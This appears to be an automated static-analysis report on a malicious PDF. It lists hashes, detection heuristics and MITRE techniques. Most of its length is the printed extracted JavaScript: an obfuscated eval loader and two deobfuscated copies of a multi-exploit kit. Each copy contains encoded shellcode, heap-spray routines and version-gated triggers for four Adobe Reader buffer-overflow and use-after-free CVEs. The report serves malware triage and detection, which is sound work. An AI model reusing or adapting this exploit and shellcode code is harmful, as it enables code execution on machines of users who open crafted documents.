Malicious PDF — malware analysis report

Static analysis result for SHA-256 22d16f7c7ef26acb…

MALICIOUS

PDF

Size: 32.7 KB · Created: 2010-07-25 10:32:51 · First seen: 2012-07-12
MD5: 233c42721ad578011d35a6762025613c SHA-1: cebd5fcc8b7c909a1f407bedf8207be767605eab SHA-256: 22d16f7c7ef26acb99c3eb9789451dabf645a79cb73405d17eb11555a7b58a18
Risk score: 448

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The PDF file was flagged as malicious by an ML classifier with high confidence. Static analysis identified embedded JavaScript, a common vehicle for exploiting PDF reader vulnerabilities or initiating other malicious actions. The JavaScript stream is likely responsible for the malicious behavior, potentially downloading and executing a second-stage payload. The heuristics and extracted artifacts below corroborate this: the embedded /JS object decodes a hidden second stage out of the document's /Producer metadata, and that stage contains version-gated exploit branches for four Adobe Reader CVEs (CVE-2007-5659, CVE-2008-2992, CVE-2009-0927, CVE-2009-4324).

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (10)

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0001_000.js | pdf-javascript-stream | PDF /JS object 1 at offset 0x7FA2 | 585 bytes
SHA-256: 975ae9d913b5c9a3fb8ef0af7124f346b828d247095380918078303373d1fcc5
Preview script
First 1,000 lines of the extracted script
var a=function(){zd=(function(){return this;})();xf=new Date();var id='';var qst='e'+(parseInt(xf.getFullYear())-2)+'a'+id+'l';nkvh=zd[qst.replace('2008','v')];var rlk='';var id='';nkvh('va'+id+'r zlb=th'+id+'i'+id+'s');nkvh(''+id+' mqmu=Str'+id+'ing.f'+id+'romC'+id+'harCode');nr='pr'+id+'od'+id+'uc'+'er';var bjp=zlb[nr];mxyq=id;nkvh('va'+mxyq+'r n'+id+'r=['+bjp+mxyq+']');tpx=nr;tp='le'+id+'ng'+id+'th';hgh=parseInt(tpx[tp]);id=0;moyj=xf.getFullYear()/1005;var b=function(q){return parseInt(q/2);};while(id<hgh){rlk+=mqmu(tpx[b(id)+b(hgh)]-tpx[b(id)]);id+=2;}
nkvh(rlk);};a.call();
generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery (producer-halfdiff) from raw PDF metadata at offset 0x0 | 3636 bytes
SHA-256: e290f709c3174e9b9a290457f4c5400ab7c5c48b6367ac040ae1ede6ebfc071d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var bjsg='%u9090%u9090%u16eb%u37b9%u0001%u8b00%u2434%uf789%u3e80%u74e9%uac06%udf34%ue2aa%uc3fa%ue5e8%uffff%u36ff%uded3%udfdf%u5e81%u8333%udfde%u56df%u5238%ucf90%ub052%uee8b%u8804%u8c8e%u8c8c%u8c8c%u8c8c%u8c8a%ub78c%udedb%udfdf%u898a%ub78c%ub1b0%udfdf%uaab7%ub3ad%u8bb2%u51b7%ud191%u3733%udf97%udfdf%u378f%udfa3%udfdf%u0f20%u1b5c%ub7d7%u3090%uda90%u378f%udfb3%udfdf%u0f20%u1f5a%uc8aa%u8bb5%u2c86%ub775%u21ad%uc96c%uc237%udfdf%u8fdf%u8e37%udfdf%u20df%u8c0f%u21b5%u56b7%udeb0%u3762%udfd7%udfdf%u378f%udfe3%udfdf%u0f20%ueebf%ubb1f%u8f54%u54ef%ud38d%u8d54%u54cb%uf7ad%uc766%udfdf%ueedf%uee20%u731f%ubee3%udda3%ufff3%u101e%uded2%u3d18%u5e2f%u8420%u9563%u54b5%ucf9d%ucd54%u06aa%u9b56%uc3fb%u1cbe%u54bf%ufbb3%u54fb%ue39a%u8b54%ua7da%u35de%u9554%u54c7%uff85%u34de%ueb3c%u5496%u54eb%u31de%u20ee%u1fee%u7323%u1f5b%ud8ab%u101e%uded2%u3418%ue42b%ufba3%uaaf7%u543e%ufb85%u34de%u54b9%u94d3%u8554%udec3%u5434%u54db%u37de%u9b56%uc3fb%u1dbe%udfd7%u3037%u2021%ub720%uabab%ue5af%uf0f0%uefef%uefef%uefef%uf1e6%ub1b6%ubbf0%uaff1%uafb7%ub9e0%ueee2%uf9e9%ue2ba%udfec';function ezvr(ra,qy){while(ra.length*2<qy){ra+=ra;}
ra=ra.substring(0,qy/2);return ra;} 
function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;for(var count=0;count<count2;count++){dkg[count]=yarsp+payload;} 
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;} 
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});} 
function printf(){nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");var payload=unescape(bjsg);heapblock=nop+payload;bigblock=unescape("%u0A0A%u0A0A");headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;} 
fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;} 
mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;} 
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);} 
function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(bjsg);var hWq500CN=payload.length*2;var qy=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload;} 
var tUMhNbGw=unescape("%09");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;} 
tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}} 
aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version;}} 
if((lv==9)||((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6)||(sv==7))&&(lv<7.11)){bx();}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date());}
var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version;}} 
if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(bjsg);while(d.length<=0x8000){d+=d;}
d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e;}
a();a();try{this.media.newPlayer(null);}catch(e){}
a();}}
generic_stage_recovery_001.js | deobfuscated-js | generic stage recovery (percent-decode) from raw PDF metadata at offset 0x0 | 3632 bytes
SHA-256: 70b88cfc8a2e35a6e1dfde13eb214ee633a5156b3f2a3ab42dd6bc068c8ec2de
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s). Note that this percent-decoded variant is not byte-faithful to the recovered stage: the `%45000f` format-specifier argument passed to util.printf() in generic_stage_recovery_000.js appears here as `E000f`, and the `%09` padding character appears as a literal tab, because both were themselves consumed by the percent-decoding transform. Treat generic_stage_recovery_000.js as the authoritative copy when writing detections or signatures for these strings.
Preview script
First 1,000 lines of the extracted script
var bjsg='%u9090%u9090%u16eb%u37b9%u0001%u8b00%u2434%uf789%u3e80%u74e9%uac06%udf34%ue2aa%uc3fa%ue5e8%uffff%u36ff%uded3%udfdf%u5e81%u8333%udfde%u56df%u5238%ucf90%ub052%uee8b%u8804%u8c8e%u8c8c%u8c8c%u8c8c%u8c8a%ub78c%udedb%udfdf%u898a%ub78c%ub1b0%udfdf%uaab7%ub3ad%u8bb2%u51b7%ud191%u3733%udf97%udfdf%u378f%udfa3%udfdf%u0f20%u1b5c%ub7d7%u3090%uda90%u378f%udfb3%udfdf%u0f20%u1f5a%uc8aa%u8bb5%u2c86%ub775%u21ad%uc96c%uc237%udfdf%u8fdf%u8e37%udfdf%u20df%u8c0f%u21b5%u56b7%udeb0%u3762%udfd7%udfdf%u378f%udfe3%udfdf%u0f20%ueebf%ubb1f%u8f54%u54ef%ud38d%u8d54%u54cb%uf7ad%uc766%udfdf%ueedf%uee20%u731f%ubee3%udda3%ufff3%u101e%uded2%u3d18%u5e2f%u8420%u9563%u54b5%ucf9d%ucd54%u06aa%u9b56%uc3fb%u1cbe%u54bf%ufbb3%u54fb%ue39a%u8b54%ua7da%u35de%u9554%u54c7%uff85%u34de%ueb3c%u5496%u54eb%u31de%u20ee%u1fee%u7323%u1f5b%ud8ab%u101e%uded2%u3418%ue42b%ufba3%uaaf7%u543e%ufb85%u34de%u54b9%u94d3%u8554%udec3%u5434%u54db%u37de%u9b56%uc3fb%u1dbe%udfd7%u3037%u2021%ub720%uabab%ue5af%uf0f0%uefef%uefef%uefef%uf1e6%ub1b6%ubbf0%uaff1%uafb7%ub9e0%ueee2%uf9e9%ue2ba%udfec';function ezvr(ra,qy){while(ra.length*2<qy){ra+=ra;}
ra=ra.substring(0,qy/2);return ra;} 
function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;for(var count=0;count<count2;count++){dkg[count]=yarsp+payload;} 
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;} 
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});} 
function printf(){nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");var payload=unescape(bjsg);heapblock=nop+payload;bigblock=unescape("%u0A0A%u0A0A");headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;} 
fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;} 
mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;} 
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("E000f",num);} 
function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(bjsg);var hWq500CN=payload.length*2;var qy=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload;} 
var tUMhNbGw=unescape("	");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;} 
tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}} 
aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version;}} 
if((lv==9)||((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6)||(sv==7))&&(lv<7.11)){bx();}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date());}
var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version;}} 
if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(bjsg);while(d.length<=0x8000){d+=d;}
d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e;}
a();a();try{this.media.newPlayer(null);}catch(e){}
a();}}